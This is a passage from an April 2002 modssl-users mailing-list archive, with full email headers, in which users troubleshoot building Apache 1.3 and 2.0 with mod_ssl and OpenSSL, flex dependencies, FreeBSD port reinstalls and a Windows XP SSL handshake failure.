timestamps? Given that this is probably the same problem as we have seen with the "old" mod_ssl - my guess is more like a broken tar that resets timestamps. But I haven't verified the problem because it never failed for me :) vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 16:26:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA09369; Thu, 11 Apr 2002 16:25:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id QAA09341; Thu, 11 Apr 2002 16:24:33 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3BENRY31919 for ; Thu, 11 Apr 2002 10:23:27 -0400 Date: Thu, 11 Apr 2002 10:23:27 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: lex and yacc was Re: Apache 2.0.35 and SSL In-Reply-To: <20020411141806.GI1051@marvin-lnx.int.tele.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 11 Apr 2002, Mads Toftum wrote: > Given that this is probably the same problem as we have seen with the > "old" mod_ssl - my guess is more like a broken tar that resets timestamps. That could explain some of it. But I feel like there might be something else going on too, because... > But I haven't verified the problem because it never failed for me :) It gets rebuilt on me from time to time, and I only ever use CVS (which maintains timestamps), not tarballs (unless I'm testing a pre-release). Of course, I have lex and yacc, so it builds fine, but it's still annoying because it causes a difference in my otherwise pristine tree which it then wants me to commit. :) --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 16:38:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA09960; Thu, 11 Apr 2002 16:37:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id QAA09887; Thu, 11 Apr 2002 16:36:21 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3BEZCD31962; Thu, 11 Apr 2002 10:35:13 -0400 Date: Thu, 11 Apr 2002 10:35:12 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: "R. DuFresne" , Subject: RE: modssl for Apache 2.0 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 11 Apr 2002, R. DuFresne wrote: > I've found this, do I point at the openssl dir I have the all the sub dirs > and bins installed in, or to the source tree they were compiled from? The install dir's prefix. So, for example, if your OpenSSL is in /usr/lib and /usr/include/openssl, then you'd use --with-ssl=/usr PS: warning, danger Will Robinson: I heard a rumor that if you link to a static OpenSSL (ie, libssl.a and libcrypto.a) instead of a shared one (libssl.so and libcrypto.so) and you use mod_ssl as a DSO, then it breaks. If you get errors along the lines of unresolved symbols such as X509_INFO_free, this is probably what's going on. Watch out for that! --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 16:51:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA10744; Thu, 11 Apr 2002 16:50:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.dicecorp.com id QAA10724; Thu, 11 Apr 2002 16:49:52 +0200 (MET DST) Received: from DRAGON (internal154.dicecorp.com [192.168.100.154]) by www.dicecorp.com (8.11.1/8.11.1) with ESMTP id g3BEnja20919 for ; Thu, 11 Apr 2002 10:49:45 -0400 From: "Jeremy Walton" To: Subject: XP problem? Date: Thu, 11 Apr 2002 10:49:28 -0400 Message-ID: <001d01c1e168$15021170$9a64a8c0@DRAGON> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeremy Walton" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is the problem I'm have with Windows XP. Now it CAN be fixed by regenerating a cert until one works with XP but this is such a hastle as I have to do a web machine at least once a week. But this is what I get when I have a cert that doesn't like to work with XP. I know they released a so called patch here. http://support.microsoft.com/default.aspx?scid=kb;EN-US;q314864 . This is what I get in the log ssl_engine_log. [10/Apr/2002 13:53:16 21206] [info] Connection to child 0 established (server www.yahoo.com:443, client 0.0.0.0) [10/Apr/2002 13:53:16 21206] [info] Seeding PRNG with 1160 bytes of entropy [10/Apr/2002 13:53:16 21206] [info] Connection: Client IP: 0.0.0.0, Protocol: SSLv2, Cipher: RC4-MD5 (128/128 bits) [10/Apr/2002 13:53:16 21206] [info] Connection to child 0 closed with standard shutdown (server www.yahoo.com:443, client 0.0.0.0) As you can see the connection from the browser terminates immediatly after the encryption has been determined. This happens for 512/1024/2048 etc etc etc. I've found no consistancy. At least with what I can see. Does anyone know whats going on here? Jeremy Walton DICE Corporation ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 17:10:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA11917; Thu, 11 Apr 2002 17:09:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id RAA11885; Thu, 11 Apr 2002 17:08:08 +0200 (MET DST) Received: from SAGEONE (sageone [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3BF7wK22704; Thu, 11 Apr 2002 10:07:59 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020411100804.02dba548@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 11 Apr 2002 10:08:04 -0500 To: "Philip M. Gollucci" , Mike Loiterman From: Server Admin Subject: Re: mod_perl Cc: freebsd-questions@FreeBSD.ORG, modssl-users@modssl.org In-Reply-To: <20020411030102.A7942-100000@sduwebship.student.umd.edu> References: <005401c1e151$a8315350$0301a8c0@mike> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello: Running FBSD 4.5, I've been struggling with my first Apache+modssl install from ports and get the need to recompile with -DEAPI error as well when I run configtest. I'm unfamiliar as to what to do about that except most likely some modifications need to be made to the Makefile in each port... This are the latest ports with apache+mod_ssl-1.3.24+2.8.8. It doesn't like the mod_ssl2.8.8 port that is supposed to be alright for the SSL install...., so wondered why it didn't make install right.... and what would be the modifications?... sorry to impose on your time, but tearing out my hair and not much left before going bald! Here's the error, if you have a moment to look and advise. Need a secure server setup badly.... thanks in advance! INSTALL ERROR ====================================================================== [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) ====================================================================== At 03:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >if you install apache from ports then just go to the mod_perl port and >install that too. It will work fine. > > >END >--------------------------------------------------------------------------- --- >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 > >Science, Discovery, & the Universe (UMCP) > Webmaster & Webship Teacher > URL: http://www.sdu.umd.edu > >EJournalPress.com > Database/PERL Programmer & System Admin > URL : http://www.ejournalpress.com > >Homepage : http://p6m7g8.com >Resume : http://p6m7g8.com/Work/index.html >Software : http://p6m7g8.com/Developement/ > > > >On Thu, 11 Apr 2002, Mike Loiterman wrote: > >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> I currently have apache installed via its port, but I need to use >> mod_perl. It is my understanding that apache needs to be recompiled >> in order for this to work. How should I go about doing this? Should >> I just cd in /usr/ports/mod_perl and do a make && make install? Will >> this recompile and reinstall apache? >> >> Mike Loiterman >> mike@ascendency.net >> PGP Key 0xD1B9D18E >> >> >> -----BEGIN PGP SIGNATURE----- >> Version: PGP 7.0.4 >> Comment: Message digitally signed by Mike Loiterman >> >> iQA/AwUBPLV80WjZbUnRudGOEQJFFACgup8vH4RnPy7tsbTAQcskaXLYmGoAnjUS >> 50eHNtMkvIv7+20+DY+xA4lu >> =SaGN >> -----END PGP SIGNATURE----- >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-questions" in the body of the message >> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 18:18:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA15819; Thu, 11 Apr 2002 18:16:55 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from irvexch1.rainbow.com id SAA15379; Thu, 11 Apr 2002 18:15:13 +0200 (MET DST) Message-ID: <5606C687D4C7D5119A5800508BF30DB401C0433D@mail.rainbow.com> From: Lynn Gazis To: "'modssl-users@modssl.org'" Subject: RE: Apache 2.0.35 and SSL Date: Thu, 11 Apr 2002 09:17:39 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lynn Gazis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I found I needed to go to http://www.gnu.org and download, build, and install flex to get apache 2.0.35 to build with ssl on my HP UX 11.0 system (it didn't seem to care for the lex that was already installed). So I'd suggest you try that. Lynn Gazis (not that I have it working on that system, but it does build) -----Original Message----- From: paul priestman [mailto:primo1980@hotmail.com] Sent: Thursday, April 11, 2002 1:57 AM To: modssl-users@modssl.org Subject: Apache 2.0.35 and SSL Hello all, I am trying to compile apache 2.0.35 with ssl but it is not working. My config is as follows: ./configure --prefix=/path/whereiwant/apache \ --enable-ssl \ --with-ssl=/path/to/openssl however on make i get the following error flex -Pssl_expr_yy -s -B /home/user/jwoodman/apache/httpd-2.0.35/modules/ssl/ssl_expr_scan.l sh: flex: not found *** Error code 1 make: Fatal error: Command failed for target `ssl_expr_scan.c' Current working directory /home/user/jwoodman/apache/httpd-2.0.35/modules/ssl *** Error code 1 make: Fatal error: Command failed for target `all-recursive' Current working directory /home/user/jwoodman/apache/httpd-2.0.35/modules/ssl *** Error code 1 make: Fatal error: Command failed for target `all-recursive' Current working directory /home/user/jwoodman/apache/httpd-2.0.35/modules *** Error code 1 make: Fatal error: Command failed for target `all-recursive' I have managed to get apache 1.3.22 working with modssl and apache 2.0.35 working without ssl. Thanks for your help Regards _________________________________________________________________ Join the world's largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 18:40:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA17084; Thu, 11 Apr 2002 18:39:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from engrsrv8.eng.lsu.edu id SAA17037; Thu, 11 Apr 2002 18:38:16 +0200 (MET DST) Received: from DESG01 (engw0236.eng.lsu.edu [130.39.28.236]) by engrsrv8.eng.lsu.edu (8.11.2/8.11.2) with ESMTP id g3BGZFe18130 for ; Thu, 11 Apr 2002 11:35:15 -0500 From: "Steve Gonzales" To: Subject: Apache 2.0.* and SSL success Date: Thu, 11 Apr 2002 11:37:25 -0500 Message-ID: <001801c1e177$2949e130$ec1c2782@eng.lsu.edu> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C0432A@mail.rainbow.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Steve Gonzales" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello all. OK. I think I have a solution for base-line Apache-2.0.35 +mod_ssl +openssl-0.9.6c. So far, I've rebuilt my RedHat 7.2 test server three times and followed this checklist with success. Assumptions: Openssl and httpd tar balls are located in /download directory You untar the tar balls under the /usr/src directory. ------------------------------------------------------------- PROGRAMMING LANGUAGES (you need these before anything else) cpp gcc byacc flex patch OPENSSL-0.9.6c cd openssl-0.9.6c ./config make make test make install HTTPD-2.0.35 cd ../httpd-2.0.35 ./configure --enable-module=most --enable-ssl --with-ssl=/usr/local/ssl make make install MAKE CERTIFICATE cp /usr/local/ssl/bin/openssl /usr/local/apache2/bin cd /usr/local/apache2/bin ./openssl genrsa -des3 1024 > server.key (Enter Passphrase) chmod 400 server.key ./openssl req -new -key server.key -out server.csr ./openssl req -x509 -key server.key -in server.csr -out server.crt mkdir /usr/local/apache2/conf/ssl.key mkdir /usr/local/apache2/conf/ssl.crt mv server.crt /usr/local/apache2/conf/ssl.crt mv server.key /usr/local/apache2/conf/ssl.key TEST APACHE INSTALLATION cp /usr/local/apache2/bin/apachectl /usr/bin UNSECURE TEST apachectl start go to test URL reload to test (don't use cached files) apachectl stop reload to test (should error out) SECURE TEST apachectl startssl reload to test unsecure site (should be OK) go to test https URL reload to test secure site (should complain about the self-signed certificate) apachectl stop reload to test (should error out) ------------------------------------------------------------- HIH! Steve Gonzales Louisiana State University gonzo@eng.lsu.edu Division of Engineering Services 225.578.6069 (v) 3216G CEBA 225.578.5990 (f) Baton Rouge, LA 70803 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 22:04:40 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA27246; Thu, 11 Apr 2002 22:03:34 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from rcisd.com id WAA27206; Thu, 11 Apr 2002 22:02:50 +0200 (MET DST) Received: from chuck ([206.128.139.13]) by rcisd.com (8.9.3/8.9.3) with SMTP id KAA27542 for ; Thu, 11 Apr 2002 10:40:27 -0700 Message-ID: <01f101c1e17f$d3ee71c0$0d8b80ce@chuck> From: "Chuck Goehring" To: References: <64AED485.1FC3648B.009AA07D@netscape.net> Subject: Re: modssl for Apache 2.0 Date: Thu, 11 Apr 2002 10:39:26 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Chuck Goehring" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users George, It wasn't really my decision to go with Windows. There are many Unix-phobics out there. Have peculiar combination of requirements that causes the need for ssl - Not doing ecomerce. Chuck ----- Original Message ----- From: "George Walsh" To: Sent: Wednesday, April 10, 2002 10:07 PM Subject: RE: modssl for Apache 2.0 > Chuck: > > With Apache 2.0, mod_ssl is a part of the 'whole'. The build is a far simpler process, and the server, at least in my experience, is much crisper in terms of response. > > As for windows, that is NOT my cup of tea. We are a Micro-soft Free zone here, so I cannot comment on the peculiarities you might experience in your environment. I really do not know hy you would want to run a secure server on top of a windows box, but then I admit to a happy ignorance about it, at least :-) > > George > > >I see all the activity on the list about Apache 2.0 and modssl. Where can I get the necessary "stuff" for Apache 2.0. I don't see it on the modssl, openssl or Apache web sites. I need to get ssl up on Apache on Windows 2000. > > > > > >Chuck > > > > > -- > George Walsh, > Managing Director, > CruiseRoutes Division, > DSC Directional Services Corp > Courtenay, British Columbia, Canada > > > > > __________________________________________________________________ > Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ > > Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 23:22:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA01777; Thu, 11 Apr 2002 23:21:50 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-d10.mx.aol.com id XAA01731; Thu, 11 Apr 2002 23:20:45 +0200 (MET DST) Received: from gjmwalsh@netscape.net by imo-d10.mx.aol.com (mail_out_v32.5.) id m.b3.2547db2 (22680) for ; Thu, 11 Apr 2002 17:19:40 -0400 (EDT) Received: from netscape.com (mow-m26.webmail.aol.com [64.12.137.3]) by air-in04.mx.aol.com (v84.14) with ESMTP id MAILININ41-0411171940; Thu, 11 Apr 2002 17:19:40 -0400 Date: Thu, 11 Apr 2002 17:19:40 -0400 From: gjmwalsh@netscape.net (George Walsh) To: modssl-users@modssl.org Subject: RE: Re: modssl for Apache 2.0 Message-ID: <2275442C.7584F8A6.009AA07D@netscape.net> X-Mailer: Atlas Mailer 2.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gjmwalsh@netscape.net (George Walsh) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I stand upbraided for my open software bigotry. Actually, Chuck, apologies are in order because I was going through a heavy mailing for SuSE users where there has been discussion about Apache 2. with mod_ssl. I (rather carelessly) did not notice the source of your mailing. My sincere apologies, and the very best of luck with your project. George "Chuck Goehring" wrote: >George, > >It wasn't really my decision to go with Windows. There are many >Unix-phobics out there. Have peculiar combination of requirements that >causes the need for ssl - Not doing ecomerce. > >Chuck > >----- Original Message ----- >From: "George Walsh" >To: >Sent: Wednesday, April 10, 2002 10:07 PM >Subject: RE: modssl for Apache 2.0 > > >> Chuck: >> >> With Apache 2.0, mod_ssl is a part of the 'whole'. The build is a far >simpler process, and the server, at least in my experience, is much crisper >in terms of response. >> >> As for windows, that is NOT my cup of tea. We are a Micro-soft Free zone >here, so I cannot comment on the peculiarities you might experience in your >environment. I really do not know hy you would want to run a secure server >on top of a windows box, but then I admit to a happy ignorance about it, at >least :-) >> >> George >> >> >I see all the activity on the list about Apache 2.0 and modssl. Where >can I get the necessary "stuff" for Apache 2.0. I don't see it on the >modssl, openssl or Apache web sites. I need to get ssl up on Apache on >Windows 2000. >> > >> > >> >Chuck >> > >> >> >> -- >> George Walsh, >> Managing Director, >> CruiseRoutes Division, >> DSC Directional Services Corp >> Courtenay, British Columbia, Canada >> >> >> >> >> __________________________________________________________________ >> Your favorite stores, helpful shopping tools and great gift ideas. >Experience the convenience of buying online with Shop@Netscape! >http://shopnow.netscape.com/ >> >> Get your own FREE, personal Netscape Mail account today at >http://webmail.netscape.com/ >> >> ______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> User Support Mailing List modssl-users@modssl.org >> Automated List Manager majordomo@modssl.org >> > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > -- George Walsh, Managing Director, CruiseRoutes Division, DSC Directional Services Corp Courtenay, British Columbia, Canada __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 01:51:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA09727; Fri, 12 Apr 2002 01:50:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id BAA09708; Fri, 12 Apr 2002 01:49:49 +0200 (MET DST) Received: from SAGEONE (sageone [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3BNnZK27871; Thu, 11 Apr 2002 18:49:36 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020411184942.02dffcd0@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 11 Apr 2002 18:49:42 -0500 To: "Philip M. Gollucci" From: Server Admin Subject: Re: mod_perl Cc: Mike Loiterman , , In-Reply-To: <20020411094920.C12150-100000@sduwebship.student.umd.edu> References: <3.0.5.32.20020411100804.02dba548@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ...hmmm. thanks for the reply. I think I forgot the "distclean" part on re-installs. BTW, did you just install over the existing Apache+++...???? ..or did you deinstall the old first...?? This helps.... many thanks.... getting a bit closer methinks! At 10:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >Do this: > >cvsup /usr/share/examples/cvsup/ports-supfile >cd /usr/ports/www/apache13-modssl >make install distclean >cd ../mod_frontpage >make install distclean >cd /usr/local/sbin >./apachectl startssl >tail /var/log/httpd-error.log >[Thu Apr 11 15:53:21 2002] [notice] Apache/1.3.24 (Unix) >FrontPage/5.0.2.2623 mod_ssl/2.8.8 OpenSSL/0.9.6a configured >-- resuming normal operations >[Thu Apr 11 15:53:21 2002] [notice] Accept mutex: flock (Default: flock) > >For reference, I just did this myself 5 >minutes ago with FreeBSD4.5-RELEASE and ports as of 5 minutes ago >Works like a charm. > > >END >--------------------------------------------------------------------------- --- >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 > >Science, Discovery, & the Universe (UMCP) > Webmaster & Webship Teacher > URL: http://www.sdu.umd.edu > >EJournalPress.com > Database/PERL Programmer & System Admin > URL : http://www.ejournalpress.com > >Homepage : http://p6m7g8.com >Resume : http://p6m7g8.com/Work/index.html >Software : http://p6m7g8.com/Developement/ > > > >On Thu, 11 Apr 2002, Server Admin wrote: > >> Hello: Running FBSD 4.5, I've been struggling with my first Apache+modssl >> install from ports and get the need to recompile with -DEAPI error as well >> when I run configtest. I'm unfamiliar as to what to do about that except >> most likely some modifications need to be made to the Makefile in each >> port... This are the latest ports with apache+mod_ssl-1.3.24+2.8.8. >> >> It doesn't like the mod_ssl2.8.8 port that is supposed to be alright for >> the SSL install...., so wondered why it didn't make install right.... and >> what would be the modifications?... sorry to impose on your time, but >> tearing out my hair and not much left before going bald! >> >> Here's the error, if you have a moment to look and advise. Need a secure >> server setup badly.... thanks in advance! >> >> INSTALL ERROR >> ====================================================================== >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses >> plain Apache 1.3 API, this module might crash under EAPI! (please recompile >> it with -DEAPI) >> [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO >> libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module >> might crash under EAPI! (please recompile it with -DEAPI) >> ====================================================================== >> >> At 03:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: >> >if you install apache from ports then just go to the mod_perl port and >> >install that too. It will work fine. >> > >> > >> >END >> >--------------------------------------------------------------------------- >> --- >> >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 >> > >> >Science, Discovery, & the Universe (UMCP) >> > Webmaster & Webship Teacher >> > URL: http://www.sdu.umd.edu >> > >> >EJournalPress.com >> > Database/PERL Programmer & System Admin >> > URL : http://www.ejournalpress.com >> > >> >Homepage : http://p6m7g8.com >> >Resume : http://p6m7g8.com/Work/index.html >> >Software : http://p6m7g8.com/Developement/ >> > >> > >> > >> >On Thu, 11 Apr 2002, Mike Loiterman wrote: >> > >> >> >> >> -----BEGIN PGP SIGNED MESSAGE----- >> >> Hash: SHA1 >> >> >> >> I currently have apache installed via its port, but I need to use >> >> mod_perl. It is my understanding that apache needs to be recompiled >> >> in order for this to work. How should I go about doing this? Should >> >> I just cd in /usr/ports/mod_perl and do a make && make install? Will >> >> this recompile and reinstall apache? >> >> >> >> Mike Loiterman >> >> mike@ascendency.net >> >> PGP Key 0xD1B9D18E >> >> >> >> >> >> -----BEGIN PGP SIGNATURE----- >> >> Version: PGP 7.0.4 >> >> Comment: Message digitally signed by Mike Loiterman >> >> >> >> iQA/AwUBPLV80WjZbUnRudGOEQJFFACgup8vH4RnPy7tsbTAQcskaXLYmGoAnjUS >> >> 50eHNtMkvIv7+20+DY+xA4lu >> >> =SaGN >> >> -----END PGP SIGNATURE----- >> >> >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> with "unsubscribe freebsd-questions" in the body of the message >> >> >> > >> > >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >with "unsubscribe freebsd-questions" in the body of the message >> > >> > >> >> .... our website: http://www.sage-one.net/ >> >> Best regards, >> >> Jack L. Stone >> Server Admin >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-questions" in the body of the message >> > > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 09:28:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA29451; Fri, 12 Apr 2002 09:27:49 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA29382; Fri, 12 Apr 2002 09:26:46 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 533A74CE75C; Fri, 12 Apr 2002 09:26:45 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3C7PXf92884; Fri, 12 Apr 2002 09:25:33 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sduwebship.student.umd.edu id VAA26928; Thu, 11 Apr 2002 21:58:00 +0200 (MET DST) Received: from localhost (philip@localhost) by sduwebship.student.umd.edu (8.11.6/8.11.6) with ESMTP id g3BF1dQ12209; Thu, 11 Apr 2002 10:01:40 -0500 (EST) (envelope-from philip@sduwebship.student.umd.edu) Date: Thu, 11 Apr 2002 10:01:37 -0500 (EST) From: "Philip M. Gollucci" To: Server Admin Cc: Mike Loiterman , , Subject: Re: mod_perl In-Reply-To: <3.0.5.32.20020411100804.02dba548@mail.sage-one.net> Message-ID: <20020411094920.C12150-100000@sduwebship.student.umd.edu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Philip M. Gollucci" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Do this: cvsup /usr/share/examples/cvsup/ports-supfile cd /usr/ports/www/apache13-modssl make install distclean cd ../mod_frontpage make install distclean cd /usr/local/sbin ./apachectl startssl tail /var/log/httpd-error.log [Thu Apr 11 15:53:21 2002] [notice] Apache/1.3.24 (Unix) FrontPage/5.0.2.2623 mod_ssl/2.8.8 OpenSSL/0.9.6a configured -- resuming normal operations [Thu Apr 11 15:53:21 2002] [notice] Accept mutex: flock (Default: flock) For reference, I just did this myself 5 minutes ago with FreeBSD4.5-RELEASE and ports as of 5 minutes ago Works like a 